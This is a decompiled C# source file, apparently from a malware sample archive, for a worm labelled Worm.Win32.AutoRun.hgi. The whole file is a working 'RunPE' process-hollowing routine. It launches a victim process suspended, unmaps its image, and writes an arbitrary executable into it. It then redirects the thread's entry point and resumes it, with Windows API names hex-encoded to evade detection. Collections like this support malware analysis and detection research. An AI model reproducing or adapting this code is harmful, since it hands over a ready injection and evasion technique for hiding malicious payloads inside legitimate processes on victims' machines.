MalwareSourceCode/MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/RunPE.cs
2022-08-18 06:28:56 -05:00

408 lines
16 KiB
C#

// Decompiled with JetBrains decompiler
// Type: BCV5StuB.RunPE
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace BCV5StuB
{
public sealed class RunPE : NativeDllCalls
{
private const int CONTEXT_X86 = 65536;
private const int CONTEXT86_INTEGER = 65538;
private const long MEM_COMMIT = 4096;
private const long MEM_RESERVE = 8192;
private const long PAGE_EXECUTE_READWRITE = 64;
private const long PAGE_EXECUTE_READ = 32;
private const long PAGE_EXECUTE = 16;
private const long PAGE_NOACCESS = 1;
private const long PAGE_READWRITE = 4;
private const uint PAGE_READONLY = 2;
private const string KERNEL32HEX = "0x6b65726e656c3332";
private const string NTDLLHEX = "0x6e74646c6c";
[DebuggerNonUserCode]
public RunPE()
{
}
private long Protect(long characteristics) => Conversions.ToLong(new object[8]
{
(object) 1L,
(object) 16L,
(object) 2U,
(object) 32L,
(object) 4L,
(object) 64L,
(object) 4L,
(object) 64L
}[checked ((int) this.RShift(characteristics, 29L))]);
private long RShift(long lValue, long lNumberOfBitsToShift) => checked ((long) Math.Round(unchecked (this.vbLongToULong(lValue) / Math.Pow(2.0, (double) lNumberOfBitsToShift))));
private double vbLongToULong(long Value) => Value < 0L ? (double) Value + 4294967296.0 : (double) Value;
public bool SRexec(string sExePath, string sVictim)
{
bool flag;
return File.Exists(sExePath) ? this.SRexec(File.ReadAllBytes(sExePath), sVictim) : flag;
}
public bool SRexec(byte[] b, string sVictim)
{
RunPE.IMAGE_DOS_HEADER imageDosHeader1 = new RunPE.IMAGE_DOS_HEADER();
RunPE.CONTEXT lpContext = new RunPE.CONTEXT();
RunPE.IMAGE_NT_HEADERS imageNtHeaders1 = new RunPE.IMAGE_NT_HEADERS();
RunPE.IMAGE_SECTION_HEADER imageSectionHeader1 = new RunPE.IMAGE_SECTION_HEADER();
RunPE.PROCESS_INFORMATION lpProcessInformation = new RunPE.PROCESS_INFORMATION();
RunPE.STARTUPINFO lpStartupInfo = new RunPE.STARTUPINFO();
RunPE.SECURITY_ATTRIBUTES lpProcessAttributes = new RunPE.SECURITY_ATTRIBUTES();
RunPE.SECURITY_ATTRIBUTES lpThreadAttributes = new RunPE.SECURITY_ATTRIBUTES();
GCHandle gcHandle = GCHandle.Alloc((object) b, GCHandleType.Pinned);
IntPtr ptr = gcHandle.AddrOfPinnedObject();
int int32 = ptr.ToInt32();
object structure1 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), imageDosHeader1.GetType());
RunPE.IMAGE_DOS_HEADER imageDosHeader2;
RunPE.IMAGE_DOS_HEADER imageDosHeader3 = structure1 != null ? (RunPE.IMAGE_DOS_HEADER) structure1 : imageDosHeader2;
gcHandle.Free();
IntPtr lpEnvironment;
if (!((RunPE.CreateProcessA) this.DynamicCall("0x6b65726e656c3332", "0x43726561746550726f6365737341", typeof (RunPE.CreateProcessA)))((string) null, sVictim, ref lpProcessAttributes, ref lpThreadAttributes, false, 4U, lpEnvironment, (string) null, ref lpStartupInfo, out lpProcessInformation))
return false;
ptr = new IntPtr(checked (int32 + imageDosHeader3.e_lfanew));
object structure2 = Marshal.PtrToStructure(ptr, imageNtHeaders1.GetType());
RunPE.IMAGE_NT_HEADERS imageNtHeaders2;
RunPE.IMAGE_NT_HEADERS imageNtHeaders3 = structure2 != null ? (RunPE.IMAGE_NT_HEADERS) structure2 : imageNtHeaders2;
lpStartupInfo.cb = Strings.Len((object) lpStartupInfo);
lpContext.ContextFlags = 65538U;
if (imageNtHeaders3.Signature != 17744U | imageDosHeader3.e_magic != (ushort) 23117)
return false;
RunPE.GetThreadContext getThreadContext = (RunPE.GetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x476574546872656164436f6e74657874", typeof (RunPE.GetThreadContext));
RunPE.ReadProcessMemory readProcessMemory1 = (RunPE.ReadProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x5265616450726f636573734d656d6f7279", typeof (RunPE.ReadProcessMemory));
RunPE.ZwUnmapViewOfSection unmapViewOfSection = (RunPE.ZwUnmapViewOfSection) this.DynamicCall("0x6e74646c6c", "0x5a77556e6d6170566965774f6653656374696f6e", typeof (RunPE.ZwUnmapViewOfSection));
int num1 = getThreadContext(lpProcessInformation.hThread, ref lpContext) ? 1 : 0;
RunPE.ReadProcessMemory readProcessMemory2 = readProcessMemory1;
IntPtr hProcess1 = lpProcessInformation.hProcess;
int lpBaseAddress1 = checked ((int) ((long) lpContext.Ebx + 8L));
long num2;
ptr = (IntPtr) num2;
ref IntPtr local1 = ref ptr;
int num3 = 0;
ref int local2 = ref num3;
int num4 = readProcessMemory2(hProcess1, lpBaseAddress1, ref local1, 4, ref local2);
long num5 = (long) ptr;
int num6 = num4 >= 0 ? 1 : 0;
if ((num1 & num6 & (unmapViewOfSection(lpProcessInformation.hProcess, (IntPtr) num5) >= 0L ? 1 : 0)) == 0)
return false;
uint num7 = checked ((uint) (int) ((RunPE.VirtualAllocEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c416c6c6f634578", typeof (RunPE.VirtualAllocEx)))(lpProcessInformation.hProcess, (IntPtr) (long) imageNtHeaders3.OptionalHeader.ImageBase, imageNtHeaders3.OptionalHeader.SizeOfImage, 12288U, 4U));
if (num7 == 0U)
return false;
RunPE.WriteProcessMemory writeProcessMemory1 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
IntPtr hProcess2 = lpProcessInformation.hProcess;
IntPtr lpBaseAddress2 = (IntPtr) (long) num7;
byte[] lpBuffer1 = b;
int sizeOfHeaders = checked ((int) imageNtHeaders3.OptionalHeader.SizeOfHeaders);
uint num8;
int num9 = checked ((int) num8);
ref int local3 = ref num9;
int num10 = writeProcessMemory1(hProcess2, lpBaseAddress2, lpBuffer1, sizeOfHeaders, out local3) ? 1 : 0;
uint num11 = checked ((uint) num9);
long num12 = (long) checked (imageDosHeader3.e_lfanew + 248);
int num13 = checked ((int) imageNtHeaders3.FileHeader.NumberOfSections - 1);
int num14 = 0;
while (num14 <= num13)
{
ptr = new IntPtr(checked ((long) int32 + num12 + (long) (num14 * 40)));
object structure3 = Marshal.PtrToStructure(ptr, imageSectionHeader1.GetType());
RunPE.IMAGE_SECTION_HEADER imageSectionHeader2;
imageSectionHeader1 = structure3 != null ? (RunPE.IMAGE_SECTION_HEADER) structure3 : imageSectionHeader2;
byte[] numArray = new byte[checked ((int) imageSectionHeader1.SizeOfRawData + 1)];
int num15 = checked ((int) ((long) imageSectionHeader1.SizeOfRawData - 1L));
int index = 0;
while (index <= num15)
{
numArray[index] = b[checked ((int) ((long) imageSectionHeader1.PointerToRawData + (long) index))];
checked { ++index; }
}
RunPE.WriteProcessMemory writeProcessMemory2 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
RunPE.VirtualProtectEx virtualProtectEx = (RunPE.VirtualProtectEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c50726f746563744578", typeof (RunPE.VirtualProtectEx));
RunPE.WriteProcessMemory writeProcessMemory3 = writeProcessMemory2;
IntPtr hProcess3 = lpProcessInformation.hProcess;
IntPtr lpBaseAddress3 = (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress);
byte[] lpBuffer2 = numArray;
int sizeOfRawData = checked ((int) imageSectionHeader1.SizeOfRawData);
num9 = checked ((int) num11);
ref int local4 = ref num9;
int num16 = writeProcessMemory3(hProcess3, lpBaseAddress3, lpBuffer2, sizeOfRawData, out local4) ? 1 : 0;
num11 = checked ((uint) num9);
int num17 = virtualProtectEx(lpProcessInformation.hProcess, (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress), (UIntPtr) imageSectionHeader1.Misc.VirtualSize, (UIntPtr) checked ((ulong) this.Protect((long) imageSectionHeader1.Characteristics)), checked ((uint) num5));
checked { ++num14; }
}
byte[] bytes = BitConverter.GetBytes(num7);
RunPE.WriteProcessMemory writeProcessMemory4 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
IntPtr hProcess4 = lpProcessInformation.hProcess;
IntPtr lpBaseAddress4 = (IntPtr) checked ((long) lpContext.Ebx + 8L);
byte[] lpBuffer3 = bytes;
num9 = checked ((int) num11);
ref int local5 = ref num9;
int num18 = writeProcessMemory4(hProcess4, lpBaseAddress4, lpBuffer3, 4, out local5) ? 1 : 0;
num8 = checked ((uint) num9);
lpContext.Eax = checked (num7 + imageNtHeaders3.OptionalHeader.AddressOfEntryPoint);
RunPE.SetThreadContext setThreadContext = (RunPE.SetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x536574546872656164436f6e74657874", typeof (RunPE.SetThreadContext));
RunPE.ResumeThread resumeThread = (RunPE.ResumeThread) this.DynamicCall("0x6b65726e656c3332", "0x526573756d65546872656164", typeof (RunPE.ResumeThread));
bool flag;
return setThreadContext(lpProcessInformation.hThread, ref lpContext) ? resumeThread(lpProcessInformation.hThread) > 0U : flag;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct STARTUPINFO
{
public int cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public int dwX;
public int dwY;
public int dwXSize;
public int dwYSize;
public int dwXCountChars;
public int dwYCountChars;
public int dwFillAttribute;
public int dwFlags;
public short wShowWindow;
public short cbReserved2;
public int lpReserved2;
public int hStdInput;
public int hStdOutput;
public int hStdError;
}
private struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
private struct IMAGE_DOS_HEADER
{
public ushort e_magic;
public ushort e_cblp;
public ushort e_cp;
public ushort e_crlc;
public ushort e_cparhdr;
public ushort e_minalloc;
public ushort e_maxalloc;
public ushort e_ss;
public ushort e_sp;
public ushort e_csum;
public ushort e_ip;
public ushort e_cs;
public ushort e_lfarlc;
public ushort e_ovno;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] e_res1;
public ushort e_oemid;
public ushort e_oeminfo;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] e_res2;
public int e_lfanew;
}
private struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
private struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
private struct CONTEXT
{
public uint ContextFlags;
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
public RunPE.FLOATING_SAVE_AREA FloatSave;
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
}
private struct IMAGE_OPTIONAL_HEADER32
{
public ushort Magic;
public byte MajorLinkerVersion;
public byte MinorLinkerVersion;
public uint SizeOfCode;
public uint SizeOfInitializedData;
public uint SizeOfUninitializedData;
public uint AddressOfEntryPoint;
public uint BaseOfCode;
public uint BaseOfData;
public uint ImageBase;
public uint SectionAlignment;
public uint FileAlignment;
public ushort MajorOperatingSystemVersion;
public ushort MinorOperatingSystemVersion;
public ushort MajorImageVersion;
public ushort MinorImageVersion;
public ushort MajorSubsystemVersion;
public ushort MinorSubsystemVersion;
public uint Win32VersionValue;
public uint SizeOfImage;
public uint SizeOfHeaders;
public uint CheckSum;
public ushort Subsystem;
public ushort DllCharacteristics;
public uint SizeOfStackReserve;
public uint SizeOfStackCommit;
public uint SizeOfHeapReserve;
public uint SizeOfHeapCommit;
public uint LoaderFlags;
public uint NumberOfRvaAndSizes;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public RunPE.IMAGE_DATA_DIRECTORY[] DataDirectory;
}
private struct IMAGE_FILE_HEADER
{
public ushort Machine;
public ushort NumberOfSections;
public uint TimeDateStamp;
public uint PointerToSymbolTable;
public uint NumberOfSymbols;
public ushort SizeOfOptionalHeader;
public ushort Characteristics;
}
private struct IMAGE_DATA_DIRECTORY
{
public uint VirtualAddress;
public uint Size;
}
private struct IMAGE_NT_HEADERS
{
public uint Signature;
public RunPE.IMAGE_FILE_HEADER FileHeader;
public RunPE.IMAGE_OPTIONAL_HEADER32 OptionalHeader;
}
private struct Misc
{
public uint PhysicalAddress;
public uint VirtualSize;
}
private struct IMAGE_SECTION_HEADER
{
public byte Name;
public RunPE.Misc Misc;
public uint VirtualAddress;
public uint SizeOfRawData;
public uint PointerToRawData;
public uint PointerToRelocations;
public uint PointerToLinenumbers;
public ushort NumberOfRelocations;
public ushort NumberOfLinenumbers;
public uint Characteristics;
}
private enum ImageSignatureTypes
{
IMAGE_OS2_SIGNATURE_LE = 17740, // 0x0000454C
IMAGE_VXD_SIGNATURE = 17740, // 0x0000454C
IMAGE_OS2_SIGNATURE = 17742, // 0x0000454E
IMAGE_NT_SIGNATURE = 17744, // 0x00004550
IMAGE_DOS_SIGNATURE = 23117, // 0x00005A4D
}
private delegate uint ResumeThread(IntPtr hThread);
private delegate bool GetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);
private delegate bool SetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);
private delegate bool CreateProcessA(
string lpApplicationName,
string lpCommandLine,
ref RunPE.SECURITY_ATTRIBUTES lpProcessAttributes,
ref RunPE.SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref RunPE.STARTUPINFO lpStartupInfo,
out RunPE.PROCESS_INFORMATION lpProcessInformation);
private delegate bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int iSize,
out int lpNumberOfBytesWritten);
private delegate int ReadProcessMemory(
IntPtr hProcess,
int lpBaseAddress,
ref IntPtr lpbuffer,
int size,
ref int lpNumberOfBytesRead);
private delegate long ZwUnmapViewOfSection(IntPtr hProcess, IntPtr BaseAddress);
private delegate IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
uint flAllocationType,
uint flProtect);
private delegate int VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
UIntPtr dwSize,
UIntPtr flNewProtect,
[Out] uint lpflOldProtect);
}
}